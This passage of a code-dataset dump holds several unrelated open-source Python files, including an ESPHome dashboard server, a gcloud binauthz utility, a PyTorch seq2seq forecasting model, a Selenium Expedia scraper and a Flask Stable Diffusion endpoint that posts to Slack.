'wb') as f:\n f.write(self.request.body)\n self.set_status(200)\n\n\nclass DeleteRequestHandler(BaseHandler):\n @authenticated\n @bind_config\n def post(self, configuration=None):\n config_file = settings.rel_path(configuration)\n storage_path = ext_storage_path(settings.config_dir, configuration)\n storage_json = StorageJSON.load(storage_path)\n if storage_json is None:\n self.set_status(500)\n return\n\n name = storage_json.name\n trash_path = trash_storage_path(settings.config_dir)\n mkdir_p(trash_path)\n shutil.move(config_file, os.path.join(trash_path, configuration))\n\n # Delete build folder (if exists)\n build_folder = os.path.join(settings.config_dir, name)\n if build_folder is not None:\n shutil.rmtree(build_folder, os.path.join(trash_path, name))\n\n\nclass UndoDeleteRequestHandler(BaseHandler):\n @authenticated\n @bind_config\n def post(self, configuration=None):\n config_file = settings.rel_path(configuration)\n trash_path = trash_storage_path(settings.config_dir)\n shutil.move(os.path.join(trash_path, configuration), config_file)\n\n\nPING_RESULT = {} # type: dict\nSTOP_EVENT = threading.Event()\nPING_REQUEST = threading.Event()\n\n\nclass LoginHandler(BaseHandler):\n def get(self):\n if is_authenticated(self):\n self.redirect('/')\n else:\n self.render_login_page()\n\n def render_login_page(self, error=None):\n self.render(\"templates/login.html\", error=error, hassio=settings.using_hassio_auth,\n has_username=bool(settings.username), **template_args())\n\n def post_hassio_login(self):\n import requests\n\n headers = {\n 'X-HASSIO-KEY': os.getenv('HASSIO_TOKEN'),\n }\n data = {\n 'username': self.get_argument('username', ''),\n 'password': self.get_argument('password', '')\n }\n try:\n req = requests.post('http://hassio/auth', headers=headers, data=data)\n if req.status_code == 200:\n self.set_secure_cookie(\"authenticated\", cookie_authenticated_yes)\n self.redirect('/')\n return\n except Exception as err: # pylint: disable=broad-except\n _LOGGER.warning(\"Error during Hass.io auth request: %s\", err)\n self.set_status(500)\n self.render_login_page(error=\"Internal server error\")\n return\n self.set_status(401)\n self.render_login_page(error=\"Invalid username or password\")\n\n def post_native_login(self):\n username = self.get_argument(\"username\", '')\n password = self.get_argument(\"password\", '')\n if settings.check_password(username, password):\n self.set_secure_cookie(\"authenticated\", cookie_authenticated_yes)\n self.redirect(\"/\")\n return\n error_str = \"Invalid username or password\" if settings.username else \"Invalid password\"\n self.set_status(401)\n self.render_login_page(error=error_str)\n\n def post(self):\n if settings.using_hassio_auth:\n self.post_hassio_login()\n else:\n self.post_native_login()\n\n\nclass LogoutHandler(BaseHandler):\n @authenticated\n def get(self):\n self.clear_cookie(\"authenticated\")\n self.redirect('./login')\n\n\n_STATIC_FILE_HASHES = {}\n\n\ndef get_static_file_url(name):\n static_path = os.path.join(os.path.dirname(__file__), 'static')\n if name in _STATIC_FILE_HASHES:\n hash_ = _STATIC_FILE_HASHES[name]\n else:\n path = os.path.join(static_path, name)\n with open(path, 'rb') as f_handle:\n hash_ = hashlib.md5(f_handle.read()).hexdigest()[:8]\n _STATIC_FILE_HASHES[name] = hash_\n return f'./static/{name}?hash={hash_}'\n\n\ndef make_app(debug=False):\n def log_function(handler):\n if handler.get_status() < 400:\n log_method = access_log.info\n\n if isinstance(handler, SerialPortRequestHandler) and not debug:\n return\n if isinstance(handler, PingRequestHandler) and not debug:\n return\n elif handler.get_status() < 500:\n log_method = access_log.warning\n else:\n log_method = access_log.error\n\n request_time = 1000.0 * handler.request.request_time()\n # pylint: disable=protected-access\n log_method(\"%d %s %.2fms\", handler.get_status(),\n handler._request_summary(), request_time)\n\n class StaticFileHandler(tornado.web.StaticFileHandler):\n def set_extra_headers(self, path):\n if debug:\n self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')\n\n static_path = os.path.join(os.path.dirname(__file__), 'static')\n app_settings = {\n 'debug': debug,\n 'cookie_secret': settings.cookie_secret,\n 'log_function': log_function,\n 'websocket_ping_interval': 30.0,\n }\n rel = settings.relative_url\n app = tornado.web.Application([\n (rel + \"\", MainRequestHandler),\n (rel + \"login\", LoginHandler),\n (rel + \"logout\", LogoutHandler),\n (rel + \"logs\", EsphomeLogsHandler),\n (rel + \"upload\", EsphomeUploadHandler),\n (rel + \"compile\", EsphomeCompileHandler),\n (rel + \"validate\", EsphomeValidateHandler),\n (rel + \"clean-mqtt\", EsphomeCleanMqttHandler),\n (rel + \"clean\", EsphomeCleanHandler),\n (rel + \"vscode\", EsphomeVscodeHandler),\n (rel + \"ace\", EsphomeAceEditorHandler),\n (rel + \"update-all\", EsphomeUpdateAllHandler),\n (rel + \"edit\", EditRequestHandler),\n (rel + \"download.bin\", DownloadBinaryRequestHandler),\n (rel + \"serial-ports\", SerialPortRequestHandler),\n (rel + \"ping\", PingRequestHandler),\n (rel + \"delete\", DeleteRequestHandler),\n (rel + \"undo-delete\", UndoDeleteRequestHandler),\n (rel + \"wizard.html\", WizardRequestHandler),\n (rel + r\"static/(.*)\", StaticFileHandler, {'path': static_path}),\n ], **app_settings)\n\n if debug:\n _STATIC_FILE_HASHES.clear()\n\n return app\n\n\ndef start_web_server(args):\n settings.parse_args(args)\n mkdir_p(settings.rel_path(\".esphome\"))\n\n if settings.using_auth:\n path = esphome_storage_path(settings.config_dir)\n storage = EsphomeStorageJSON.load(path)\n if storage is None:\n storage = EsphomeStorageJSON.get_default()\n storage.save(path)\n settings.cookie_secret = storage.cookie_secret\n\n app = make_app(args.verbose)\n if args.socket is not None:\n _LOGGER.info(\"Starting dashboard web server on unix socket %s and configuration dir %s...\",\n args.socket, settings.config_dir)\n server = tornado.httpserver.HTTPServer(app)\n socket = tornado.netutil.bind_unix_socket(args.socket, mode=0o666)\n server.add_socket(socket)\n else:\n _LOGGER.info(\"Starting dashboard web server on port %s and configuration dir %s...\",\n args.port, settings.config_dir)\n app.listen(args.port)\n\n if args.open_ui:\n import webbrowser\n\n webbrowser.open(f'localhost:{args.port}')\n\n if settings.status_use_ping:\n status_thread = PingStatusThread()\n else:\n status_thread = MDNSStatusThread()\n status_thread.start()\n try:\n tornado.ioloop.IOLoop.current().start()\n except KeyboardInterrupt:\n _LOGGER.info(\"Shutting down...\")\n STOP_EVENT.set()\n PING_REQUEST.set()\n status_thread.join()\n if args.socket is not None:\n os.remove(args.socket)\n","repo_name":"wjcarpenter/mvturnho_esphome_ili9341","sub_path":"esphome/dashboard/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":24470,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"27766744039","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport json\n\nfrom containerregistry.client import docker_name\nfrom googlecloudsdk.core.exceptions import Error\nimport six\nfrom six.moves import urllib\n\n\nclass BadImageUrlError(Error):\n \"\"\"Raised when a container image URL cannot be parsed successfully.\"\"\"\n\n\ndef _ReplaceImageUrlScheme(image_url, scheme):\n \"\"\"Returns the passed `image_url` with the scheme replaced.\n\n Args:\n image_url: The URL to replace (or strip) the scheme from. (string)\n scheme: The scheme of the returned URL. If this is an empty string or\n `None`, the scheme is stripped and the leading `//` of the resulting URL\n will be stripped off.\n Raises:\n BadImageUrlError: `image_url` isn't valid.\n \"\"\"\n scheme = scheme or ''\n parsed_url = urllib.parse.urlparse(image_url)\n\n # If the URL has a scheme but not a netloc, then it must have looked like\n # 'scheme:///foo/bar', which is invalid for the purpose of attestation.\n if parsed_url.scheme and not parsed_url.netloc:\n raise BadImageUrlError(\n \"Image URL '{image_url}' is invalid because it does not have a host \"\n 'component.'.format(image_url=image_url))\n\n # If there is neither a scheme nor a netloc, this means that an unqualified\n # URL was passed, like 'gcr.io/foo/bar'. In this case we canonicalize the URL\n # by prefixing '//', which will cause urlparse to correctly pick up the\n # netloc.\n if not parsed_url.netloc:\n parsed_url = urllib.parse.urlparse('//{}'.format(image_url))\n\n # Finally, we replace the scheme and generate the URL. If we were stripping\n # the scheme, the result will be prefixed with '//', which we strip off. If\n # the scheme is non-empty, the lstrip is a no-op.\n return parsed_url._replace(scheme=scheme).geturl().lstrip('/')\n\n\ndef MakeSignaturePayloadDict(container_image_url):\n \"\"\"Creates a dict representing a JSON signature object to sign.\n\n Args:\n container_image_url: See `containerregistry.client.docker_name.Digest` for\n artifact URL validation and parsing details. `container_image_url` must\n be a fully qualified image URL with a valid sha256 digest.\n\n Returns:\n Dictionary of nested dictionaries and strings, suitable for passing to\n `json.dumps` or similar.\n \"\"\"\n url = _ReplaceImageUrlScheme(image_url=container_image_url, scheme='')\n try:\n repo_digest = docker_name.Digest(url)\n except docker_name.BadNameException as e:\n raise BadImageUrlError(e)\n return {\n 'critical': {\n 'identity': {\n 'docker-reference': six.text_type(repo_digest.as_repository()),\n },\n 'image': {\n 'docker-manifest-digest': repo_digest.digest,\n },\n 'type': 'Google cloud binauthz container signature',\n },\n }\n\n\ndef MakeSignaturePayload(container_image_url):\n \"\"\"Creates a JSON bytestring representing a signature object to sign.\n\n Args:\n container_image_url: See `containerregistry.client.docker_name.Digest` for\n artifact URL validation and parsing details. `container_image_url` must\n be a fully qualified image URL with a valid sha256 digest.\n\n Returns:\n A bytestring representing a JSON-encoded structure of nested dictionaries\n and strings.\n \"\"\"\n payload_dict = MakeSignaturePayloadDict(container_image_url)\n # `separators` is specified as a workaround to the native `json` module's\n # https://bugs.python.org/issue16333 which results in inconsistent\n # serialization in older versions of Python.\n payload = json.dumps(\n payload_dict,\n ensure_ascii=True,\n indent=2,\n separators=(',', ': '),\n sort_keys=True,\n )\n # NOTE: A newline is appended for backwards compatibility with the previous\n # payload serialization which relied on gcloud's default JSON serialization.\n return '{}\\n'.format(payload).encode('utf-8')\n\n\ndef RemoveArtifactUrlScheme(artifact_url):\n \"\"\"Ensures the given URL has no scheme (e.g.\n\n replaces \"https://gcr.io/foo/bar\" with \"gcr.io/foo/bar\" and leaves\n \"gcr.io/foo/bar\" unchanged).\n\n Args:\n artifact_url: A URL string.\n Returns:\n The URL with the scheme removed.\n \"\"\"\n url_without_scheme = _ReplaceImageUrlScheme(artifact_url, scheme='')\n try:\n # The validation logic in `docker_name` silently produces incorrect results\n # if the passed URL has a scheme.\n docker_name.Digest(url_without_scheme)\n except docker_name.BadNameException as e:\n raise BadImageUrlError(e)\n return url_without_scheme\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/container/binauthz/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"37026084499","text":"from .models import Notification, PushNotificationDevice\nfrom profile.models import Profile\n\ndef create_notification(notifier, recipient, type, **kwargs):\n try:\n Notification.objects.create(\n notifier=notifier,\n recipient=recipient,\n notification_type=type,\n status=Notification.NEW,\n amount=kwargs.get('amount'),\n memo=kwargs.get('memo'),\n )\n return True\n except Exception as e:\n print(e)\n return False\n\n\ndef subscribe_to_push(user, device_id):\n \"\"\"\n Subscribe logged-in device to push notification\n \"\"\"\n if PushNotificationDevice.objects.filter(device_id=device_id).all():\n return\n\n profile = Profile.objects.get(user__exact=user)\n device = PushNotificationDevice(\n profile=profile,\n device_id=device_id,\n )\n device.save()\n","repo_name":"DevFamily99/villages-django","sub_path":"notification/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41429151758","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport os\nimport math\nfrom tqdm import tqdm\nfrom torch.utils.data import TensorDataset, DataLoader\n\nabs_path = os.getcwd()\n\n\nclass Encoder(nn.Module):\n def __init__(self, input_size, hidden_dim, n_layers, drop_prob):\n super(Encoder, self).__init__()\n # init\n self.hidden_dim = hidden_dim\n self.n_layers = n_layers\n # layer\n self.rnn = nn.GRU(input_size,\n hidden_dim,\n n_layers,\n bidirectional=False,\n dropout=drop_prob)\n\n def forward(self, x):\n # x shape:(`batch_size`, `num_steps`, `input_size`)\n x = torch.transpose(x, 0, 1)\n rnn_out, state = self.rnn(x)\n return rnn_out, state\n\n\nclass DotProductAttention(nn.Module):\n\n def __init__(self, dropout, **kwargs):\n super(DotProductAttention, self).__init__(**kwargs)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, queries, keys, values):\n d = queries.shape[-1]\n scores = torch.bmm(queries, keys.transpose(1, 2)) / math.sqrt(d)\n self.attention_weights = nn.functional.softmax(scores, dim=-1)\n return torch.bmm(self.dropout(self.attention_weights), values)\n\n\nclass AttnDecoder(nn.Module):\n def __init__(self, input_size, hidden_dim, n_layers, drop_prob):\n super(AttnDecoder, self).__init__()\n\n self.attention = DotProductAttention(drop_prob)\n self.rnn = nn.GRU(input_size + hidden_dim, hidden_dim, n_layers, dropout=drop_prob)\n self.fc = nn.Sequential()\n\n input_size = hidden_dim\n i = 0\n while (input_size > 8):\n self.fc.add_module('linear{}'.format(i),\n nn.Linear(input_size, round(input_size / 2)))\n self.fc.add_module('relu{}'.format(i), nn.ReLU())\n input_size = round(input_size / 2)\n i += 1\n self.fc.add_module('linear{}'.format(i), nn.Linear(input_size, 1))\n\n def forward(self, inputs, encoder_outputs, encoder_state):\n \"\"\"\n :inputs shape (batch_size, target_len, input_size)\n :encoder_outputs shape (seq_len, batch_size, hidden_dim)\n :encoder_state shape (n_layers, batch_size, hidden_dim)\n \"\"\"\n # inputs shape(target_len, batch_size, input_size)\n inputs = torch.transpose(inputs, 0, 1)\n # encoder_outputs shape (batch_size, seq_len, hidden_dim)\n encoder_outputs = torch.transpose(encoder_outputs, 0, 1)\n # decoder_state init\n decoder_state = encoder_state\n outputs = []\n\n for i, x in enumerate(inputs):\n # query shape is (batch_size, 1, hidden_dim)\n query = torch.unsqueeze(decoder_state[-1], dim=1)\n context = self.attention(query, encoder_outputs, encoder_outputs)\n # training process is different from eval process\n # if i and not self.training:\n if i:\n x[:, -1] = out.detach().flatten()\n # x shape is (batch_size, 1, hidden_dim + input_size)\n x = torch.cat((context, torch.unsqueeze(x, dim=1)), dim=-1)\n # x reshape to (1, batch_size, hidden_dim + input_size)\n x = torch.transpose(x, 0, 1)\n # out shape (1, batch_size, hidden_dim)\n out, decoder_state = self.rnn(x, decoder_state)\n # out shape (batch_size, 1)\n out = self.fc(out.squeeze(dim=0))\n outputs.append(out)\n # outputs shape (batch_size, target_len)\n outputs = torch.cat(outputs, dim=1)\n return outputs\n\n\nclass Seq2Seq_Attn(nn.Module):\n def __init__(self, input_size, hidden_dim, n_layers, drop_prob):\n super(Seq2Seq_Attn, self).__init__()\n self.encoder = Encoder(input_size, hidden_dim, n_layers, drop_prob)\n self.decoder = AttnDecoder(input_size, hidden_dim, n_layers, drop_prob)\n\n def forward(self, encoder_inputs, decoder_inputs):\n # encoder_inputs shape (batch_size, seq_len, input_size)\n # decoder_inputs shape (batch_size, target_len, input_size)\n encoder_outputs, encoder_state = self.encoder(encoder_inputs)\n outputs = self.decoder(decoder_inputs, encoder_outputs, encoder_state)\n return outputs\n\n\ndef train_model(train_x, train_y, valid_x, valid_y, input_size, mse_thresh, hidden_dim,\n n_layers, number_epoch, batch_size, lr, drop_prob,\n weight_decay, device):\n while 1:\n model = Seq2Seq_Attn(input_size, hidden_dim, n_layers, drop_prob)\n model = model.to(device)\n criterion = nn.MSELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1, gamma=0.98)\n valid_loss_min = np.Inf\n train_dataset = TensorDataset(torch.FloatTensor(train_x),\n torch.FloatTensor(train_y))\n valid_dataset = TensorDataset(torch.FloatTensor(valid_x),\n torch.FloatTensor(valid_y))\n\n train_loader = DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True,\n drop_last=True)\n valid_loader = DataLoader(dataset=valid_dataset,\n batch_size=batch_size,\n shuffle=True,\n drop_last=True)\n train_losses = list()\n\n num_without_imp = 0\n\n train_loss_list = []\n valid_loss_list = []\n # train\n for epoch in range(1, number_epoch + 1):\n loop = tqdm(enumerate(train_loader),\n total=len(train_loader),\n leave=True, ncols=100)\n for i, (inputs, labels) in loop:\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n encoder_inputs = inputs\n decoder_inputs = torch.cat((inputs[:, -1:, :], labels[:, :-1, :]), dim=1)\n outputs = model(encoder_inputs, decoder_inputs)\n loss = criterion(outputs, labels[:, :, -1])\n train_losses.append(loss.item)\n loss.backward()\n optimizer.step()\n\n # eval\n if i % 5 == 0:\n num_without_imp = num_without_imp + 1\n valid_losses = list()\n model.eval()\n for inp, lab in valid_loader:\n inp = inp.to(device)\n lab = lab.to(device)\n encoder_inp = inp\n decoder_inp = torch.cat((inp[:, -1:, :], lab[:, :-1, :]), dim=1)\n out = model(encoder_inp, decoder_inp)\n valid_loss = criterion(out, lab[:, :, -1])\n valid_losses.append(valid_loss.item())\n model.train()\n loop.set_description(\"Epoch: {}/{}...\".format(\n epoch, number_epoch))\n loop.set_postfix(train_loss=loss.item(),\n valid_loss=np.mean(valid_losses))\n train_loss_list.append(loss.item())\n valid_loss_list.append(np.mean(valid_losses))\n if np.mean(valid_losses) < valid_loss_min:\n num_without_imp = 0\n torch.save(model.state_dict(), abs_path + \"/models/model/seq2seq_DPA_state_dict.pt\")\n valid_loss_min = np.mean(valid_losses)\n scheduler.step()\n if valid_loss_min < mse_thresh:\n break\n return model, train_loss_list, valid_loss_list\n\n\ndef test_model(model, test_x, test_y, scaler_y, batch_size, device):\n test_dataset = TensorDataset(torch.FloatTensor(test_x),\n torch.FloatTensor(test_y))\n test_loader = DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n shuffle=False,\n drop_last=True)\n model.load_state_dict(torch.load(abs_path + \"/models/model/seq2seq_DPA_state_dict.pt\"))\n y_pred = []\n y_true = []\n with torch.no_grad():\n model.eval()\n for inputs, labels in test_loader:\n inputs = inputs.to(device)\n labels = labels.to(device)\n encoder_inputs = inputs\n decoder_inputs = torch.cat((inputs[:, -1:, :], labels[:, :-1, :]),\n dim=1)\n outputs = model(encoder_inputs, decoder_inputs)\n y_pred += outputs.cpu().numpy().flatten().tolist()\n y_true += labels[:, :, -1].cpu().numpy().flatten().tolist()\n y_pred = np.array(y_pred).reshape(-1, 1)\n y_true = np.array(y_true).reshape(-1, 1)\n # pdb.set_trace()\n load_pred = scaler_y.inverse_transform(y_pred)\n load_true = scaler_y.inverse_transform(y_true)\n mean_pred = np.mean(load_pred)\n mean_true = np.mean(load_true)\n MAPE = np.mean(np.abs(load_true - load_pred) / load_true)\n SMAPE = 2 * np.mean(\n np.abs(load_true - load_pred) / (load_true + load_pred))\n MAE = np.mean(np.abs(load_true - load_pred))\n RRSE = np.sqrt(np.sum(np.square(load_true - load_pred))) / np.sqrt(\n np.sum(np.square(load_true - mean_true)))\n return MAPE, SMAPE, MAE, RRSE, load_pred, load_true\n","repo_name":"Mark-THU/DARNet-load-forecast","sub_path":"models/Seq2seq.py","file_name":"Seq2seq.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19379875574","text":"##### Python and Selenium to automatically open expedia.com, enter SLC departure, SEA arrival and dates. Output to console\r\n\r\n### Import modules/libraries\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.common.by import By\r\nimport selenium.webdriver.support.ui as ui\r\nimport selenium.webdriver.support.expected_conditions as EC\r\nimport os\r\nimport time\r\n\r\nclass expediaUnitTest():\r\n \r\n ### Create class and initiate environment variables \r\n\tdef __init__(self):\r\n\t\toptions = webdriver.ChromeOptions()\r\n\t\toptions.add_argument('--ignore-certificate-errors')\r\n\t\toptions.add_argument('--ignore-ssl-errors')\r\n\t\tdir_path = os.path.dirname(os.path.realpath(__file__))\r\n\t\tchromedriver = dir_path + \"/chromedriver\"\r\n\t\tos.environ[\"webdriver.chrome.driver\"] = chromedriver\r\n\t\tself.driver = webdriver.Chrome(chrome_options=options, executable_path= chromedriver)\r\n\r\n\r\n### Launch Chrome expedia.com. Enters flight origin, destination, and dates. Clicks Submit button.\r\n\tdef gotoexpedia(self):\r\n\t\tself.driver.get(\"https://www.expedia.com/\")\r\n\t\tui.WebDriverWait(self.driver, 15).until(EC.visibility_of_element_located((By.ID, \"tab-flight-tab-hp\")))\r\n\t\tself.driver.find_element_by_id(\"tab-flight-tab-hp\").click()\r\n\t\tui.WebDriverWait(self.driver, 15).until(EC.visibility_of_element_located((By.ID, \"flight-origin-hp-flight\")))\r\n\t\tself.driver.find_element_by_id(\"flight-origin-hp-flight\").send_keys('SLC')\r\n\t\tself.driver.find_element_by_id(\"flight-destination-hp-flight\").send_keys('LAX')\r\n\t\tself.driver.find_element_by_id(\"flight-departing-hp-flight\").send_keys('03/01/2018')\r\n\t\tself.driver.find_element_by_id(\"flight-returning-hp-flight\").clear()\r\n\t\tself.driver.find_element_by_id(\"flight-returning-hp-flight\").send_keys('03/05/2018')\r\n\t\tself.driver.find_element_by_class_name('gcw-submit').click()\r\n\t\ttime.sleep(10)\r\n\r\n# Loops through flightModuleList. Specifies \"//*\" to select everything in each module, then prints out class attribute name and prices to console. \t\t\r\n\t\tparentTab = self.driver.find_element_by_id('flightModuleList')\r\n\t\tfor selectAll in parentTab.find_elements_by_xpath(\"//*\"):\r\n\t\t\tif selectAll.get_attribute(\"class\") == 'dollars price-emphasis':\r\n\t\t\t\tprint (selectAll.get_attribute(\"class\"))\r\n\t\t\t\tprint (selectAll.text)\r\n\t\t\r\n# Closes Chrome after time.sleep \t\r\n\tdef teardown(self):\r\n\t\ttime.sleep(10)\r\n\t\tself.driver.close()\r\n\r\nif __name__ == \"__main__\":\r\n\tobj = expediaUnitTest()\r\n\tobj.gotoexpedia()\r\n\tobj.teardown()\r\n\t\r\n\r\n","repo_name":"Bearzz/expediaAutomation","sub_path":"testplaneprices.py","file_name":"testplaneprices.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31759198940","text":"import pandas as pd\nimport pickle\n# import numpy as np\n# import json\n\ndata_file = open(\"../../data/raw\"+\"/final_hdsi_faculty_updated.csv\", \"r\")\n\ndf = pd.read_csv(data_file)\n\ndf_test = df.sample(frac=0.1, random_state=1, ignore_index=True)\n\n# ---------------\nprint('export test.csv to test/raw folder')\ndf_test.to_csv('../../test/raw/test_data.csv', index=True, sep='\\t')\n\nprint('get number of authors in the new dataframe')\nnumber_of_authors = len(list(df_test['HDSI_author'].unique()))\n\nprint(number_of_authors)\n\npickle.dump(number_of_authors, open('../../test/raw/number_of_authors.pkl', 'wb'))\n\n# ---------------\n\n# pd.DataFrame.from_dict(data_cfg, orient=\"index\").transpose()\n\n\n","repo_name":"IreneLiu2018/capstone_a14","sub_path":"Irene/test/raw/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43145304561","text":"from org import StableDiffusion\nfrom flask import Flask,request, jsonify\n# from flask_socketio import SocketIO, send, emit\nimport argparse\nfrom waitress import serve\nimport logging\nimport io\n\nfrom send_slack import send_file\n\napp = Flask(__name__)\n\nclass Dummy():\n def __init__(self) -> None: \n app.logger.info('use dummy')\n name = \"dummy\"\n\n def predict(self, prompt):\n return 'dummy'\n \nclass InitModelMiddlewere:\n def __init__(self, app, stableDiffusion):\n self.app = app\n self.sd = stableDiffusion \n\n def __call__(self, environ, start_response): \n if 'sd' not in environ.keys(): \n environ['sd'] = self.sd\n return self.app(environ, start_response)\n\ndef img_to_byte(img):\n imgByteArr = io.BytesIO()\n img.save(imgByteArr, format='png')\n imgByteArr = imgByteArr.getvalue()\n return imgByteArr\n\n@app.before_request\ndef log_request_info():\n app.logger.info('%s - %s - %s - %s', request.remote_addr, request.method, request.url, request.query_string)\n\n@app.route(\"/\", methods=['GET'])\ndef echo():\n return {\n \"message\": 'ok',\n }\n\n\"\"\"\nquery_string(required): prompt\nreturn: image array\n\"\"\"\n@app.route('/predict', methods=['GET'])\ndef predict():\n args = request.args \n prompt = args.get('prompt')\n if prompt is None:\n return jsonify({'message': 'prompt must set'}), 400\n\n if 'sd' not in request.environ.keys():\n return jsonify({'message': 'sd not set...'}), 500\n \n sd = request.environ['sd']\n\n try: \n sd = request.environ['sd']\n result = sd.predict(prompt)\n images = [ v.tolist() for v in result]\n return jsonify({ 'message': 'ok', 'images': images })\n except Exception as e:\n app.logger.info('exception %s', e)\n return jsonify({'message': 'server error'}), 500\n\n@app.route('/post_json', methods=['POST'])\ndef process_json():\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json = request.json\n return json\n else:\n return 'Content-Type not supported!'\n \n\"\"\"\nfor slack slash command\n\"\"\"\n@app.route('/make_image', methods=['POST'])\ndef make_image(): \n content_type = request.headers.get('Content-Type')\n if (content_type != 'application/json'):\n return jsonify({'message': 'set content_type json'}), 400\n\n prompt = request.json['text']\n if prompt is None:\n return jsonify({'message': 'prompt must set'}), 400\n \n if 'sd' not in request.environ.keys():\n return jsonify({'message': 'sd not set...'}), 500\n sd = request.environ['sd']\n\n try: \n sd = request.environ['sd'] \n predict_images = sd.predict(prompt)\n if predict_images == \"dummy\":\n return jsonify({ 'message': 'ok, use dummy' }) \n for img in predict_images:\n b = img_to_byte(img)\n msg = \"crate prompt is {}\".format(prompt)\n r = send_file(msg, b)\n app.logger.info('send slack result: %s', r)\n return jsonify({ 'message': 'ok' })\n except Exception as e:\n app.logger.info('exception %s', e)\n return jsonify({'message': 'server error'}), 500\n\ndef run(host, port, isDev): \n app.logger.info('run.. {}:{}'.format(host, port))\n if isDev:\n # app.run(host, port, debug=args.verbose)\n app.run(host, port, debug=True) \n else: \n app.logger.info('run as prod')\n serve(app, host=host, port=port, threads=10, url_scheme='http')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=5000)\n parser.add_argument('--host', default='127.0.0.1')\n parser.add_argument('-v', '--verbose', action='store_true')\n parser.add_argument('--dev', action='store_true')\n\n parser.add_argument('-s', '--num_inference_steps', default=50, type=int)\n parser.add_argument('-n', '--num_images_per_prompt', default=1, type=int)\n parser.add_argument('--use_dummy', action='store_true', help='use dummy stable diffusion')\n parser.add_argument('--device', default=None, help='torch run device. default cpu')\n\n args = parser.parse_args()\n\n if args.use_dummy:\n sd = Dummy()\n else: \n img_size=768\n sd = StableDiffusion(img_size=64,\n num_inference_steps = args.num_inference_steps, \n num_images_per_prompt= args.num_images_per_prompt\n ) \n app.wsgi_app = InitModelMiddlewere(app.wsgi_app, sd) \n app.logger.setLevel(logging.INFO)\n run(args.host, args.port, args.dev)\n # socketio.run(app, debug=True)","repo_name":"if001/stable_diffusion_api","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"69925746142","text":"import os\nimport tempfile\nimport unittest\n\nimport simplejson\nfrom six import iteritems\n\nimport neahtta\n\n\nclass YamlTests(object):\n\n yaml_file = ''\n\n @property\n def parsed_yaml(self):\n import yaml\n if hasattr(self, '_parsed_yaml'):\n return self._parsed_yaml\n with open(self.yaml_file, 'r') as F:\n _raw_str = F.read()\n try:\n _raw = _raw_str.decode(\"utf-8\")\n except AttributeError:\n _raw = _raw_str\n _p = yaml.load(_raw, yaml.Loader)\n self._parsed_yaml = _p\n return self._parsed_yaml\n\n @property\n def wordforms_that_shouldnt_fail(self):\n def parse_item(i):\n return ((i[0], i[1]), i[2])\n\n return list(map(parse_item, self.parsed_yaml.get('LookupTests')))\n\n @property\n def paradigm_generation_tests(self):\n if hasattr(self, '_paradigm_generation_tests'):\n return self._paradigm_generation_tests\n\n _tests = []\n\n def read_test_item(i):\n _fst = i.get('lexicon')[0]\n _snd = i.get('lexicon')[1]\n _thrd = i.get('search')\n _frth = i.get('fail_message')\n\n for t, vs in iteritems(i.get('test')):\n if t == 'form_doesnt_contain':\n test_func = form_doesnt_contain\n if t == 'form_contains':\n test_func = form_contains\n _fth = test_func(set(vs))\n\n return (_fst, _snd, _thrd, _frth)\n else:\n return ()\n\n self._paradigm_generation_tests = list(map(\n read_test_item, self.parsed_yaml.get('ParadigmGeneration')))\n\n return self._paradigm_generation_tests\n\n\ndef form_contains(_test_set):\n \"\"\" A function that wraps a set, and then tests that the paradigm\n generation output partially intersects. \"\"\"\n\n def test_contains(paradigm):\n \"\"\"\n [\n [\"roa\\u0111\\u0111i\", [\"N\", \"Sg\", \"Gen\"], [\"roa\\u0111i\"]],\n [\"roa\\u0111\\u0111i\", [\"N\", \"Sg\", \"Ill\"], [\"roa\\u0111\\u0111\\u00e1i\"]],\n [\"roa\\u0111\\u0111i\", [\"N\", \"Pl\", \"Ill\"], [\"ro\\u0111iide\"]]\n ]\n \"\"\"\n forms = set(\n second_list[0]\n for first_list in paradigm\n for second_list in first_list\n )\n if not bool(forms & _test_set):\n print(78, 'failed', u' '.join(forms), u' '.join(_test_set))\n return bool(forms & _test_set)\n\n return test_contains\n\n\ndef form_doesnt_contain(_test_set):\n \"\"\" A function that wraps a set, and then tests that the paradigm\n generation output partially intersects. \"\"\"\n\n def test_doesnt_contain(paradigm):\n \"\"\"\n paradigm = [\n [\"roa\\u0111\\u0111i\", [\"N\", \"Sg\", \"Gen\"], [\"roa\\u0111i\"]],\n [\"roa\\u0111\\u0111i\", [\"N\", \"Sg\", \"Ill\"], [\"roa\\u0111\\u0111\\u00e1i\"]],\n 